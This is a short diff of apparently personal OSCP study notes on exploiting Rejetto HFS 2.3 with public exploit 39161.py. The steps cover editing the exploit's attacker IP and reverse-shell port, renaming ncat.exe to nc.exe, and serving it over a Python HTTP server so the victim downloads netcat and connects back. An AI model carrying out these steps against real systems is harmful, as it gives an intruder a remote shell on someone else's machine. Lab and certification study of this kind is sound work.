VajdaGergely/OSCP_notes/services/hfs_(rejetto)_2.3.md

 * $ nano 39161.py
   * change "ip_addr" to tun0
   * "localport" can be leaved at "443" or can be changed to arbitrary port (this will be the reverse shell port that nc will get connection on)
+* $ mv ncat.exe nc.exe
+  * rename netcat exe (in the exploit it is nc.exe, at github repo it is ncat.exe)
 * $ python -m http.server 80
   * we need it so the exploit can upload the ncat.exe to the victim
   * if we want to change it we probably has to change the commands in the exploit as well (to the appropriate port that we gave to python)